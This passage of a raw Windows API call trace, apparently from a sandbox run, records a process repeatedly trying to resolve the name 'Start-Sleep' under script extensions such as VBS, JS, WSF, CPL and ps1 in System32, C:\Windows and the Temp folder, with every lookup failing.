lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.270] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.VBS", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.270] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.270] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.270] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.270] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0264.270] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.270] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x23 [0264.270] GetFullPathNameW (in: lpFileName="Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x34 [0264.270] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.271] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.271] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.VBE", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.272] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.272] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0264.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.272] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.JS", lpFilePart=0x0) returned 0x22 [0264.272] GetFullPathNameW (in: lpFileName="Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpFilePart=0x0) returned 0x33 [0264.272] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.272] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.273] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.JS", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.273] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.273] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.274] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0264.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x23 [0264.274] GetFullPathNameW (in: lpFileName="Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x34 [0264.274] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.274] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.275] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.JSE", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.275] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.275] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0264.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.WSF", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.WSF", lpFilePart=0x0) returned 0x23 [0264.276] GetFullPathNameW (in: lpFileName="Start-Sleep.WSF", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpFilePart=0x0) returned 0x34 [0264.276] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.276] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.277] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.WSF", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.277] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0264.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.WSH", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.WSH", lpFilePart=0x0) returned 0x23 [0264.278] GetFullPathNameW (in: lpFileName="Start-Sleep.WSH", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpFilePart=0x0) returned 0x34 [0264.278] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.278] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.279] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.WSH", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.279] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.279] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.279] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.279] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0264.279] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.279] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x23 [0264.280] GetFullPathNameW (in: lpFileName="Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x34 [0264.280] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.280] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.281] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.MSC", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.281] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.281] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0264.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.281] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x23 [0264.282] GetFullPathNameW (in: lpFileName="Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x34 [0264.282] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.282] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.283] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.CPL", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.283] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0264.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep", lpFilePart=0x0) returned 0x1f [0264.283] GetFullPathNameW (in: lpFileName="Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpFilePart=0x0) returned 0x30 [0264.283] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.284] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.284] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.285] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.285] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.285] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0264.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.285] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.285] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x1a [0264.285] GetFullPathNameW (in: lpFileName="Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x34 [0264.285] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.285] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.286] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.ps1", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 